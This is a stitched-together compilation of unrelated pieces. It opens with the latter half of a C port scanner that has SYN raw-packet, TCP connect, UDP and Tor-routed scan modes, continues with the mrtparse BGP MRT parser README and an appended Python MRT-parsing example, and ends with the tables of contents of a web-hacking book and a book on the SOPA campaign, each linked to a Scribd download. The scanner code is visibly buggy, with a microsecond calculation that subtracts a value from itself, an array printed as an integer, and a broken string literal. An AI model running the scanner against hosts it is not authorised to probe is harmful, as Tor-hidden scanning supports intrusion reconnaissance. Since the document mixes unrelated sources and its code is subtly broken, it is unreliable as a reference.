    printf("\n[*] Statistics: open %d closed %d filtred %d, ", index_o, index_c, index_f);
    return 0;
}

/* get last up interface (good if you use vpn) */
int interface()
{
    char buf[8192];
    /* static: ipsource keeps pointing here after the function returns */
    static char ip[INET6_ADDRSTRLEN];
    struct ifconf ifc; //= {0};
    struct ifreq *ifr = NULL;
    int sck=0,nif=0,i=0;
    struct ifreq *item;
    struct sockaddr *addr;

    sck = socket(PF_INET, SOCK_DGRAM, 0);
    if(sck < 0) {
        perror("[ERROR] socket() interface: ");
        exit(0);
    }

    ifc.ifc_len = sizeof(buf);
    ifc.ifc_buf = buf;
    if(ioctl(sck, SIOCGIFCONF, &ifc) < 0) {
        perror("[ERROR] ioctl(SIOCGIFCONF): ");
        exit(0);
    }

    ifr = ifc.ifc_req;
    nif = ifc.ifc_len/sizeof(struct ifreq);

    for(i = 0; i < nif; i++) {
        item = &ifr[i];
        addr = &(item->ifr_addr);
    }

    eth0 = item->ifr_name;
    ipsource = (char*)inet_ntop(AF_INET,&(((struct sockaddr_in *)addr)->sin_addr),ip, INET6_ADDRSTRLEN);
    return 0;
}

unsigned short checksum (unsigned short *buf, int nwords)
{
    unsigned long sum;
    for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

/* check private ip (nmap function)*/
int checkip(char *ip)
{
    unsigned int i1[4];
    sscanf(ip,"%3u.%3u.%3u.%3u", &i1[0], &i1[1], &i1[2], &i1[3]);

    if (i1[0] >= 224) return 1;
    if (i1[0] >= 96 && i1[0] <= 127) return 1;
    if (i1[0] >= 70 && i1[0] <= 79) return 1;
    if (i1[0] >= 83 && i1[0] <= 95) return 1;
    if (i1[0] == 172 && i1[1] >= 16 && i1[1] <= 31) return 1;
    if (i1[0] == 192) {
        if (i1[1] == 168) return 1;
        else if (i1[1] == 0 && i1[2] == 2) return 1;
    }
    if (i1[0] == 169 && i1[1] == 254) return 1;
    if (i1[0] == 204 && i1[1] == 152 && (i1[2] == 64 || i1[2] == 65)) return 1;
    if (i1[0] == 255 && i1[2] == 255 && i1[3] == 255) return 1;
    return 0;
}

void synpacket(int sockfd, struct sockaddr_in sinaddr)
{
    struct iphdr ip;
    struct tcphdr tcp;
    struct pseudohdr pseudo;
    int attrib;
    char *buff = (char*)malloc(TCPSZ);
    char tmp[sizeof(struct pseudohdr)+sizeof(struct tcphdr)];

    memset(&ip, 0x0, sizeof(struct iphdr));
    memset(&tcp, 0x0, sizeof(struct tcphdr));

    ip.version = 4;
    ip.ihl = 5;
    ip.tot_len = TCPSZ;
    ip.id = htonl(12345);
    ip.ttl = 255;
    ip.protocol = IPPROTO_TCP;
    ip.saddr = inet_addr(ipsource);
    ip.daddr = inet_addr(hostname);
    ip.check = checksum((unsigned short*) &ip, ip.tot_len >> 1);

    tcp.source = (rand()%64511)+1024;
    tcp.dest = htons(port);
    tcp.seq = (rand()%0xFFFFFFFF);
    tcp.ack_seq = 0;
    tcp.doff = 5;
    tcp.syn = 1;
    tcp.window = htonl(0xffff);
    tcp.check = 0;

    sinaddr.sin_family = AF_INET;
    sinaddr.sin_port = htons(port);
    sinaddr.sin_addr.s_addr = inet_addr(hostname);

    attrib = 1;
    memset(tmp, 0x0, sizeof(struct pseudohdr)+sizeof(struct tcphdr));
    memset(buff, 0x0, TCPSZ);

    pseudo.src = ip.saddr;
    pseudo.dst = ip.daddr;
    pseudo.padd = 0;
    pseudo.proto = ip.protocol;
    pseudo.len = htons(sizeof(struct tcphdr));

    memcpy(tmp, &pseudo, sizeof(struct pseudohdr));
    memcpy(tmp+sizeof(struct pseudohdr), &tcp, sizeof(struct tcphdr));
    tcp.check = checksum ((ushort*) tmp, (PSESZ) >> 1);

    memcpy(buff, &ip, sizeof(struct iphdr));
    memcpy(buff+sizeof(struct iphdr), &tcp, sizeof(struct tcphdr));

    if (sendto (sockfd, buff, ip.tot_len, 0, (struct sockaddr *) &sinaddr, sizeof (sinaddr)) < 0) {
        fprintf (stderr,"*** Error in sendto: %s\n",strerror(errno));
        exit(1);
    }
    usleep(delay);
}

void* ackSniffer(void *arg)
{
    int sockfd;
    size_t sin_size=sizeof(struct sockaddr);
    struct iphdr ip;
    struct tcphdr tcp;
    struct sockaddr_in sock;
    char pack[HPORT];

    if((sockfd=socket (PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
        fprintf (stderr,"*** Fatal - Unable to create a raw socket: %s\n",strerror(errno));
        exit(-1);
    }

    sock.sin_family=AF_INET;
    sock.sin_port=0;
    sock.sin_addr.s_addr=inet_addr(hostname);

    while(1) {
        memset (&ip,0x0,sizeof(struct iphdr));
        memset (&tcp,0x0,sizeof(struct tcphdr));

        if(recvfrom(sockfd, pack, sizeof(pack), 0, (struct sockaddr*) &sock, &sin_size)<0) {
            fprintf (stderr,"*** Fatal - Error in recvfrom(): %s\n",strerror(errno));
            exit(-2);
        }

        memcpy (&ip,pack,sizeof(struct iphdr));
        memcpy (&tcp,pack+sizeof(struct iphdr),sizeof(struct tcphdr));

        if (ip.saddr == inet_addr(hostname) && tcp.ack && !tcp.rst && ntohs(tcp.source)){//>= min && ntohs(tcp.source) <= max) {
            if(verbose) {
                printf (" [OPEN] ACK sniffed %s:%u\t [winsize %d] [ttl %d]\n",hostname,ntohs(tcp.source),tcp.window,ip.ttl);
                fflush(stdout);
            }
            open_p[index_o++] = ntohs(tcp.source);
        } else if (ip.saddr == inet_addr(hostname) && tcp.ack && tcp.rst) {
            closed_p[index_c++] = ntohs(tcp.source);
        }
    }
    pthread_exit(0);
}

int setupsock(struct sockaddr_in sock)
{
    struct timeval tm;
    int sd, attrib = 1;

    if(syn) {
        pthread_t t;
        if(pthread_create (&t,NULL,ackSniffer,NULL)) {
            fprintf (stderr," [ERROR-ACKSNIFFER] Thread process create: [%s]\n",strerror(errno));
            exit(0);
        }
        if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
            fprintf(stderr, " [SYN - SOCKET] Unable to create raw socket: [%s]", strerror(errno));
            exit(0);
        }
        if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &attrib, sizeof(attrib)) < 0) {
            fprintf(stderr, " [SYN - SOCKOPT] Error in setsockopt: [%s]\n",strerror(errno));
            exit(0);
        }
    }

    if(conn || tor) {
        tm.tv_sec = timeout;
        tm.tv_usec = 0;
        sock.sin_family = AF_INET;

        if(conn) {
            sock.sin_port = htons(port);
            sock.sin_addr.s_addr = inet_addr(hostname);
        }
        if(tor) {
            sock.sin_port = htons(TORPORT);
            sock.sin_addr.s_addr = inet_addr(LOCALHOST);
        }

        if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
            fprintf(stderr, " [CONNECT - ERROR] Unable to create socket: [%s]", strerror(errno));
            exit(0);
        }

        if(conn) {
            fd_set fdset;
            fcntl(sd, F_SETFL, O_NONBLOCK);
            connect(sd, (struct sockaddr *)&sock, sizeof(sock));
            FD_ZERO(&fdset);
            FD_SET(sd, &fdset);

            if(select(sd+1, NULL, &fdset, NULL, &tm) == 1) {
                int so_error;
                socklen_t len = sizeof(so_error);
                getsockopt(sd, SOL_SOCKET, SO_ERROR, &so_error, &len);
                if(so_error == 0) {
                    if(verbose) printf(" OPEN\t\t%d\n", port);
                    open_p[index_o++] = port;
                } else {
                    if(verbose) printf(" CLOSED\t\t%d\n", port);
                    closed_p[index_c++] = port;
                }
            } else {
                if(verbose) printf(" FILTRED\t\t%d\n", port);
                filtred_p[index_f++] = port;
            }
            close(sd);
            return 0;
        }

        if(tor) {
            if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &attrib, 4) < 0) {
                fprintf(stderr," [TOR - SETSOCKOPT] SO_REUSEADDR: [%s]\n",strerror(errno));
                exit(0);
            }
            if(setsockopt(sd, SOL_SOCKET, SO_RCVTIMEO, (char*)&tm, sizeof(struct timeval)) < 0) {
                fprintf (stderr," [TOR - SETSOCKOPT] SO_RCVTIMEO: [%s]\n",strerror(errno));
                exit(0);
            }
            if(connect(sd, (struct sockaddr*)&sock, sizeof(sock)) != 0) {
                fprintf(stderr," [TOR - CONNECT] Connect 127.0.0.1:9050: [%s]\n",strerror(errno));
                exit(0);
            }
        }
    }
    return sd;
}

void udpscan(unsigned short port)
{
    struct sockaddr_in myudp;
    char buff[] = "0x0x0x0x0x0x0x0x0x0";
    int udpsock, rawsock, retry, retval, iplen;
    fd_set r;
    struct timeval mytimeout;
    struct icmp *packet;
    struct ip *iphdr;
    unsigned char recvbuff[UDP_PACKET];

    if((udpsock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) {
        perror(" [ERROR] Udp Socket: ");
        exit(-1);
    }
    if((rawsock = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP)) < 0) {
        perror(" [ERROR] Icmp raw_sock: ");
        exit(-1);
    }

    mytimeout.tv_sec = 2;
    mytimeout.tv_usec = 0;

    myudp.sin_family = AF_INET;
    myudp.sin_port = htons(port);
    myudp.sin_addr.s_addr = inet_addr(hostname);

    retry = 0;
    while(retry++ < UDP_RESEND) {
        if((sendto(udpsock,buff,sizeof(buff),0x0,(struct sockaddr *)&myudp,sizeof(myudp))) < 0) {
            perror(" [ERROR] Udp Sendto: ");
            exit(-1);
        }
        FD_ZERO(&r);
        FD_SET(rawsock,&r);
        retval = select((rawsock+1),&r,NULL,NULL,&mytimeout);
        if(retval) {
            if((recvfrom(rawsock,&recvbuff,sizeof(recvbuff),0x0,NULL,NULL)) < 0) {
                perror(" [ERROR] Udp Recv: ");
                exit(-1);
            }
            iphdr = (struct ip *)recvbuff;
            iplen = iphdr->ip_hl << 2;
            packet = (struct icmp *)(recvbuff + iplen);
            if((packet->icmp_type == ICMP_UNREACH) && (packet->icmp_code == ICMP_UNREACH_PORT))
                break;
        } else
            continue;
    }

    if(retry >= UDP_RESEND) {
        open_p[index_o++] = port;
        if(verbose) {
            printf(" OPEN|filtred\t%d\n", port);
            fflush(stdout);
        }
    } else
        closed_p[index_c++] = port;
}

int torscan()
{
    struct sockaddr_in torsocks;
    struct servent *service;
    unsigned short portserv;
    char *buf = calloc(1024, sizeof(char));
    short l = strlen(hostname);
    short t;
    int x,sockt;

    if(checkip(hostname)) {
        printf(" [TOR-SOCKS5] Reject connection to private address\n");
        exit(0);
    }

    sockt = setupsock(torsocks);
    write(sockt, SOCKS5, 3);
    read(sockt, buf, 1024);

    if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
        printf("Socks5 error!\n");
        exit(0);
    }

    buf[0] = 0x05;
    buf[1] = 0x01;
    buf[2] = 0x00;
    buf[3] = 0x03;
    buf[4] = l;
    for(x=0; x<l; x++)
        buf[5+x] = hostname[x];
    x=l+5;
    t = htons(port);
    memcpy((buf+x), &t, 2);
    write(sockt, buf, x+2);
    read(sockt, buf, 1024);

    if((buf[0] == 0x05) && (buf[1] == 0x00)) {
        portserv = htons(port);
        if(verbose) {
            printf(" OPEN\t\t%d",port);
            fflush(stdout);
        }
        if((service = getservbyport(portserv,"tcp"))) {
            printf("\t(%s)\n",service->s_name);
            fflush(stdout);
        } else {
            printf("\t(unknown)\n");
            fflush(stdout);
        }
        open_p[index_o++] = port;
        close(sockt);
        return 0;
    }

    if(verbose) {
        printf(" CLOSED|FILTRED\t\t%d\n",port);
        fflush(stdout);
    }
    closed_p[index_c++] = port;
    close(sockt);
    return 0;
}

int main(int argc, char **argv)
{
    struct sockaddr_in sock;
    struct servent *se;
    struct timeval start, end;
    struct winsize term;
    char *portopt, *method;
    unsigned int mtime, seconds, useconds;
    int i, c, sockfd;

    progress = 1;
    bar progress;
    setupbar(&progress);

    printf("[*] Network Scanner v1.0 starting at %s %s [*]\n",__TIME__,__DATE__);
    srand ((unsigned) time(NULL));
    gettimeofday(&start, NULL);
    signal(SIGINT, ctrlc);

    while (1) {
        static struct option long_options[] = {
            //{"verbose", no_argument, &verbose, 1 },
            {"verbose", no_argument, 0, 'v'},
            {"syn",     no_argument, 0, 's'},
            {"connect", no_argument, 0, 'c'},
            {"tor",     no_argument, 0, 't'},
            {"udp",     no_argument, 0, 'u'},
            {"banner",  no_argument, 0, 'b'},
            {"help",    no_argument, 0, 'h'},
            {"delay",   required_argument, 0, 'd'},
            {"port",    required_argument, 0, 'p'},
            {0, 0, 0, 0}
        };
        int option_index = 0;

        c = getopt_long (argc, argv, "scthvubd:p:", long_options, &option_index);
        if (c == -1)
            break;

        switch (c) {
            case 0:
                if (long_options[option_index].flag != 0)
                    break;
                printf ("option %s", long_options[option_index].name);
                if (optarg)
                    printf (" with arg %s", optarg);
                break;

            case 's':
                if(getuid() != 0) {
                    printf("
[ERROR-PERMISSION] You must to be root\n"); exit(0); } syn = 1; method = "synpacket"; interface(); sockfd = setupsock(sock); break; case 'c': conn = 1; method = "connect"; break; case 't': tor = 1; method = "tor"; break; case 'u': udp = 1; method = "udp"; break; case 'b': banserv = 1; break; case 'd': delay = atoi(optarg); break; case 'p': portcontrol(optarg); portopt = optarg; break; case 'v': verbose = 1; //progress = 0; break; case 'h': help(); case '?': help(); break; default: help(); } } if (optind < argc) { while (optind < argc) hostname = argv[optind++]; } else help(); if(!(hostname = resolveHost(hostname))) { fprintf (stderr,"\n [RESOLUTION-ERROR] Unable to resolve: %s\n\n",hostname); exit(0); } if ((syn && tor && conn && udp) || (syn && conn) || (syn && tor) || (tor && conn)) help(); if ((udp && syn && conn) || (udp && syn) || (udp && conn) || (udp && tor)) help(); if (!syn && !tor && !conn && !udp) { if(getuid() == 0) { syn = 1; method = "synpacket"; interface(); sockfd = setupsock(sock); } else { conn = 1; method = "connect"; } } if (!rangeport && !singleport && !specificport) normal = 1; if(!verbose) { ioctl(0, TIOCGWINSZ, &term); if(term.ws_col < progress.width+10) verbose = 1; } if (rangeport) { printf(" Host: %s Method: %s Port: [%d-%d]\n\n", hostname, method, min, max); if(!verbose) { printf(" "); progress.max = max-min; } for(port=min, i=1; port<max; port++, i++) { if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd, sock); if(udp) udpscan(port); if(!verbose) progressbar(i, &progress); } } if (specificport) { printf(" Host: %s Method: %s Port: [", hostname, method); for(i=0; i<index_p; i++) { printf("%d", ports); if(i != index_p-1) printf(","); } puts("]\n"); if(!verbose) { printf(" "); progress.max = i-1; } for(i=0; i<index_p; i++) { port = ports; if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd, sock); if(udp) udpscan(port); if(!verbose) progressbar(i, &progress); } } if (singleport) { printf(" Host: %s 
Method: %s Port: [%s]\n", hostname, method, portopt); port = min; if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd,sock); if(udp) udpscan(port); } if (normal) { printf(" Host: %s Method: %s ports: [/etc/services]\n\n", hostname, method); if(!verbose) { printf(" "); progress.max = 312; i = 0; } while((se = getservent())) { if(udp) { if(strcmp(se->s_proto, "udp") == 0) { port = ntohs(se->s_port); udpscan(port); if(!verbose) progressbar(++i, &progress); } } if(syn || conn || tor) { if(strcmp(se->s_proto, "tcp") == 0) { port = ntohs(se->s_port); if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd, sock); if(!verbose) progressbar(++i, &progress); } } } } printf("\n\n"); gettimeofday(&end, NULL); seconds = end.tv_sec - start.tv_sec; useconds = end.tv_usec - end.tv_usec; mtime = ((seconds)*1000 + useconds/1000.0) +0.5; statistic(); if((seconds/60) > 0) printf("scanned in %d.%d.%d min\n", seconds/60,seconds%60,abs(mtime-(seconds*1000))); else printf("scanned in %d.%d sec\n", seconds%60, abs(mtime-(seconds*1000))); return 0; }
-
mrtparse is a module to read and analyze MRT format data. The MRT format can be used to export routing protocol messages, state changes, and routing information base contents, and is standardized in RFC6396. Programs like Quagga / Zebra, BIRD, OpenBGPD and PyRT can dump MRT format data.

Currently supported types
Table_Dump(12), Table_Dump_V2(13), BGP4MP(16), BGP4MP_ET(17)

Requirements
Python2 or Python3

Download
git command
$ git clone https://github.com/YoshiyukiYamauchi/mrtparse.git
Browser
Access https://github.com/YoshiyukiYamauchi/mrtparse.git, and click 'Download ZIP'.

Install
$ cd <Clone Directory>
$ python setup.py install
running install
running build
running build_py
running install_lib
copying build/lib/mrtparse.py -> /Library/Python/2.7/site-packages
byte-compiling /Library/Python/2.7/site-packages/mrtparse.py to mrtparse.pyc
running install_egg_info
Writing /Library/Python/2.7/site-packages/mrtparse-0.8-py2.7.egg-info

Usage
from mrtparse import *
or
import mrtparse

Programming
First, import the module.
from mrtparse import *
Then pass the MRT format data, as a file path string or a file object, to the class Reader(). gzip and bzip2 compressed files are also supported. You can retrieve each entry from the returned object in a loop and then process it.
d = Reader(f)
for m in d:
    <statements>

Example
These scripts are included in the 'examples' directory.

print_all.py
Description
It displays the contents of an MRT format file.
Usage
print_all.py <path to the file>
Result
---------------------------------------------------------------
MRT Header
    Timestamp: 1392828028(2014-02-20 01:40:28)
    Type: 16(BGP4MP)
    Subtype: 5(BGP4MP_STATE_CHANGE_AS4)
    Length: 24
BGP4MP_STATE_CHANGE_AS4
    Peer AS Number: 100
    Local AS Number: 64512
    Interface Index: 0
    Address Family: 1(AFI_IPv4)
    Peer IP Address: 192.168.1.21
    Local IP Address: 192.168.1.100
    Old State: 5(OpenConfirm)
    New State: 6(Established)
---------------------------------------------------------------
MRT Header
    Timestamp: 1392828028(2014-02-20 01:40:28)
    Type: 16(BGP4MP)
    Subtype: 4(BGP4MP_MESSAGE_AS4)
...

exabgp_conf.py
Description
It converts MRT format data to the 'exabgp' config format and displays it.
Usage
exabgp_conf.py <path to the file>
Result
neighbor 192.168.1.100 {
    router-id 192.168.0.20;
    local-address 192.168.1.20;
    local-as 65000;
    peer-as 64512;
    graceful-restart;

    static {
        route 1.0.0.0/24 origin IGP as-path [29049 15169 ] next-hop 192.168.1.254;
        route 1.0.4.0/24 origin IGP as-path [29049 6939 7545 56203 ] next-hop 192.168.1.254;
        route 1.0.5.0/24 origin IGP as-path [29049 6939 7545 56203 ] next-hop 192.168.1.254;
        route 1.0.6.0/24 origin IGP as-path [29049 20485 4826 38803 56203 ] community [20485:31701] next-hop 192.168.1.254;
        route 1.0.7.0/24 origin IGP as-path [29049 20485 4826 38803 56203 ] community [20485:31701] next-hop 192.168.1.254;
        route 1.0.20.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254;
        route 1.0.22.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254;
        route 1.0.24.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254;
        route 1.0.26.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254;
        route 1.0.28.0/22 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254;
        ...
    }
}

Authors
Tetsumune KISO t2mune@gmail.com
Yoshiyuki YAMAUCHI info@greenhippo.co.jp
Nobuhiro ITOU js333123@gmail.com

Source
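As an added illustration of the record layout that mrtparse reads (this is not the module's own code and does not use its Reader() API), here is a minimal RFC 6396 walker: it frames records by the common header, handles the extra microsecond field of BGP4MP_ET, decodes the two BGP4MP state-change subtypes, and sniffs gzip/bzip2 the way the README says Reader() accepts compressed dumps. The input is constructed inline with the same values as the print_all.py output above; the type, subtype and FSM-state tables are the RFC 6396 code points.

```python
"""Minimal MRT (RFC 6396) record walker on constructed input.
Stand-alone illustration; not the mrtparse module's own code."""
import bz2
import gzip
import ipaddress
import struct

# RFC 6396 code points; the four types are the ones mrtparse lists as supported.
MRT_TYPES = {12: "TABLE_DUMP", 13: "TABLE_DUMP_V2", 16: "BGP4MP", 17: "BGP4MP_ET"}
BGP4MP_SUBTYPES = {
    0: "BGP4MP_STATE_CHANGE", 1: "BGP4MP_MESSAGE",
    4: "BGP4MP_MESSAGE_AS4", 5: "BGP4MP_STATE_CHANGE_AS4",
    6: "BGP4MP_MESSAGE_LOCAL", 7: "BGP4MP_MESSAGE_AS4_LOCAL",
}
BGP_FSM_STATES = {1: "Idle", 2: "Connect", 3: "Active", 4: "OpenSent",
                  5: "OpenConfirm", 6: "Established"}

COMMON_HDR = struct.Struct("!IHHI")  # timestamp, type, subtype, length


def decompress(raw):
    """Unpack gzip or bzip2 dumps by magic bytes; pass plain data through."""
    if raw[:2] == b"\x1f\x8b":
        return gzip.decompress(raw)
    if raw[:3] == b"BZh":
        return bz2.decompress(raw)
    return raw


def iter_records(data):
    """Yield (timestamp, type, subtype, usec, body) per record.
    Stops with ValueError on a truncated header or body instead of mis-framing."""
    off = 0
    while off < len(data):
        if len(data) - off < COMMON_HDR.size:
            raise ValueError("truncated MRT header at offset %d" % off)
        ts, mtype, subtype, length = COMMON_HDR.unpack_from(data, off)
        off += COMMON_HDR.size
        usec = None
        if mtype == 17:  # BGP4MP_ET: 4-byte microsecond field, included in length
            if length < 4:
                raise ValueError("BGP4MP_ET record shorter than its timestamp")
            (usec,) = struct.unpack_from("!I", data, off)
            off += 4
            length -= 4
        if len(data) - off < length:
            raise ValueError("truncated MRT body at offset %d" % off)
        yield ts, mtype, subtype, usec, data[off:off + length]
        off += length


def parse_state_change(subtype, body):
    """Decode BGP4MP_STATE_CHANGE (16-bit ASNs) or _AS4 (32-bit ASNs)."""
    as_fmt = "!II" if subtype == 5 else "!HH"
    peer_as, local_as = struct.unpack_from(as_fmt, body, 0)
    off = struct.calcsize(as_fmt)
    ifindex, afi = struct.unpack_from("!HH", body, off)
    off += 4
    alen = 4 if afi == 1 else 16  # AFI 1 = IPv4, 2 = IPv6
    peer_ip = ipaddress.ip_address(body[off:off + alen])
    local_ip = ipaddress.ip_address(body[off + alen:off + 2 * alen])
    off += 2 * alen
    old_state, new_state = struct.unpack_from("!HH", body, off)
    if off + 4 != len(body):
        raise ValueError("state-change body has trailing bytes")
    return {"peer_as": peer_as, "local_as": local_as, "ifindex": ifindex, "afi": afi,
            "peer_ip": str(peer_ip), "local_ip": str(local_ip),
            "old_state": BGP_FSM_STATES.get(old_state, old_state),
            "new_state": BGP_FSM_STATES.get(new_state, new_state)}


def parse_dump(raw):
    """Return decoded records; bodies of other subtypes are kept raw."""
    out = []
    for ts, mtype, subtype, usec, body in iter_records(decompress(raw)):
        is_bgp4mp = mtype in (16, 17)
        rec = {"timestamp": ts, "type": MRT_TYPES.get(mtype, mtype), "usec": usec,
               "subtype": BGP4MP_SUBTYPES.get(subtype, subtype) if is_bgp4mp else subtype}
        if is_bgp4mp and subtype in (0, 5):
            rec.update(parse_state_change(subtype, body))
        else:
            rec["body"] = body
        out.append(rec)
    return out


def build_state_change_as4(ts, peer_as, local_as, peer_ip, local_ip, old, new, usec=None):
    """Constructed test record (IPv4, ifindex 0); BGP4MP_ET framing when usec is given."""
    body = struct.pack("!IIHH", peer_as, local_as, 0, 1)
    body += ipaddress.ip_address(peer_ip).packed + ipaddress.ip_address(local_ip).packed
    body += struct.pack("!HH", old, new)
    if usec is None:
        return COMMON_HDR.pack(ts, 16, 5, len(body)) + body
    return COMMON_HDR.pack(ts, 17, 5, len(body) + 4) + struct.pack("!I", usec) + body


# Constructed sample: the OpenConfirm -> Established record from the output above,
# once as plain BGP4MP and once as BGP4MP_ET with a microsecond timestamp.
SAMPLE = (build_state_change_as4(1392828028, 100, 64512, "192.168.1.21", "192.168.1.100", 5, 6)
          + build_state_change_as4(1392828028, 100, 64512, "192.168.1.21", "192.168.1.100", 5, 6,
                                   usec=250000))

if __name__ == "__main__":
    for rec in parse_dump(gzip.compress(SAMPLE)):
        print(rec)
```

The length check before every body slice is the part worth keeping when handling dumps from untrusted route collectors: a record whose Length field overstates the remaining bytes is rejected rather than silently yielding a short body and resynchronising on garbage.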
-
TABLE OF CONTENTS

Cover image
Title page
Copyright
Dedication
Acknowledgments
    Honey Bear
    Lizard
    Baby Bird
    Family And Friends
    Security Community
    Scott White Technical Reviewer
    Syngress Team
    My Vices
Biography
Foreword
Introduction
    About This Book
    A Hands-On Approach
    What's In This Book?
    A Quick Disclaimer
Chapter 1. The Basics of Web Hacking
    Chapter Rundown
    Introduction
    What Is A Web Application?
    What You Need To Know About Web Servers
    What You Need To Know About HTTP
    The Basics Of Web Hacking: Our Approach
    Web Apps Touch Every Part Of IT
    Existing Methodologies
    Most Common Web Vulnerabilities
    Setting Up A Test Environment
Chapter 2. Web Server Hacking
    Chapter Rundown
    Introduction
    Reconnaissance
    Port Scanning
    Vulnerability Scanning
    Exploitation
    Maintaining Access
Chapter 3. Web Application Recon and Scanning
    Chapter Rundown
    Introduction
    Web Application Recon
    Web Application Scanning
Chapter 4. Web Application Exploitation with Injection
    Chapter Rundown
    Introduction
    SQL Injection Vulnerabilities
    SQL Injection Attacks
    Sqlmap
    Operating System Command Injection Vulnerabilities
    Operating System Command Injection Attacks
    Web Shells
Chapter 5. Web Application Exploitation with Broken Authentication and Path Traversal
    Chapter Rundown
    Introduction
    Authentication And Session Vulnerabilities
    Path Traversal Vulnerabilities
    Brute Force Authentication Attacks
    Session Attacks
    Path Traversal Attacks
Chapter 6. Web User Hacking
    Chapter Rundown
    Introduction
    Cross-Site Scripting (XSS) Vulnerabilities
    Cross-Site Request Forgery (CSRF) Vulnerabilities
    Technical Social Engineering Vulnerabilities
    Web User Recon
    Web User Scanning
    Web User Exploitation
    Cross-Site Scripting (XSS) Attacks
    Reflected XSS Attacks
    Stored XSS Attacks
    Cross-Site Request Forgery (CSRF) Attacks
    User Attack Frameworks
Chapter 7. Fixes
    Chapter Rundown
    Introduction
    Web Server Fixes
    Web Application Fixes
    Web User Fixes
Chapter 8. Next Steps
    Chapter Rundown
    Introduction
    Security Community Groups And Events
    Formal Education
    Certifications
    Additional Books
Index

Download: http://www.scribd.com/doc/211448113/The-Basics-of-Web-Hacking
-
TABLE OF CONTENTS

A Moment for Aaron
Foreword by the Editors
Hacking Politics: TLDR

PART 1: The World Before SOPA/PIPA
    AARON SWARTZ - For Me, It All Started with a Phone Call
    CORY DOCTOROW - The History of the Copyright Wars
    JOSH LEVY - Before SOPA There Was Net Neutrality
    MIKE MASNICK - COICA, PIPA, and SOPA Are Censorship

PART 2: The SOPA/PIPA Battle
    DAVID SEGAL - Now I Work for Demand Progress
    PATRICK RUFFINI - Beginning on the Right
    DAVID MOON - Demand Progress Needs a ''Washington Guy''
    GABRIEL LEVITT - SOPA's Elevation of Profits Over Patients: The Online Pharmacy Story
    PATRICK RUFFINI - Lobbying Republicans Through the Summer
    DAVID SEGAL - The Tea Party Enters the Fray
    DAVID SEGAL AND DAVID MOON - Gamers and Justin Bieber Join the Cause
    DAVID MOON - Clashes With the Big Guns
    DAVID SEGAL - Labor Sides with the Bosses
    JONNY 5 - Turning the Tide on SOPA
    DAVID SEGAL - What Was Lamar Smith Thinking?
    PATRICK RUFFINI - A Punch in the Gut
    TIFFINIY CHENG - Waking the Sleeping Giant
    AARON SWARTZ - Who's Crazy Now?
    DAVID SEGAL - Nearing the Point of No Return
    PATRICK RUFFINI - The Markup
    ANDREW MCDIARMID AND DAVID SOHN - Bring in the Nerds: The Importance of Technical Experts in Defeating SOPA and PIPA
    ERNESTO FALCON - People Powered Politics
    DAVID SEGAL AND DAVID MOON - To the White House
    DEREK SLATER - On the White House's Statement
    OCCUPY WALL STREET - Proposal to Reach Consensus on Statement Against the Stop Online Piracy Act
    TIFFINIY CHENG - The Blackout
    DAVID SEGAL - Congress Says: ''This Can't be Happening''
    SUICIDE GIRLS - I Live, Work, Play, and Love Online
    OPEN CONGRESS - Blowing Congress Wide Open
    ALEXIS OHANIAN - Why Reddit Helped Kill SOPA
    DAVID SEGAL - If Reddit's Turned Off, Maybe They'll Leave the House That Day
    PATRICK RUFFINI - Internet 1, Congress 0
    ZOE LOFGREN - Championing Technology and Free Speech in Congress Was Lonely But Not Anymore
    AARON SWARTZ - After the Blackout
    LARRY DOWNES - Who Really Stopped SOPA and Why
    EDWARD J. BLACK - Legislative Fights Are Like Icebergs
    CASEY RAE-HUNTER - Not in Our Names: Artists Stand Up for Expression
    ELIZABETH STARK - I Stopped SOPA and So Did You
    BEN HUH - Why Did the Anti-SOPA/PIPA Movement Go Viral So Quickly?
    DAVE DAYEN - The Internet Beat SOPA and PIPA: And Mean the Entire Damn Thing
    DAVID MOON - A Political Coming of Age
    PATRICK RUFFINI - This Time, the System Actually Mostly Worked

PART 3: Some Activism Since SOPA
    DAVID SEGAL AND DAVID MOON - Cyber Security and Party Platforms
    DEREK KHANNA - Fallout from the Copyfight
    JOSHUA BAUCHNER - The Seizure of Dajaz1
    NICOLE POWERS - An Interview with Julia O'Dwyer
    DEMAND PROGRESS - Raps with Megaupload Founder Kim Dotcom

PART 4: What We've Learned
    YOCHAI BENKLER ET AL - Glimpses of a Networked Public Sphere
    DAVID KARPF - Reflecting on the SOPA Blackout: Why Did It Work, and What Does It Mean?
    DAVID SEGAL - That Was Amazing. Can We Do It Again Sometime?

PART 5: Where Do We Go from Here?
    RON PAUL - The Battle for Internet Freedom Is Critical for the Liberty Movement
    ERIN MCKEOWN - A Case for Digital Activism by Artists
    BRAD BURNHAM - On the Freedom to Innovate
    MARVIN AMMORI - SOPA and the Popular First Amendment
    CORY DOCTOROW - Blanket Licenses: One Path Forward in Copyright Reform
    LAWRENCE LESSIG - The Internet Can Help Strike at the Root

Conclusion

Download: http://www.scribd.com/doc/211448475/Hacking-Politics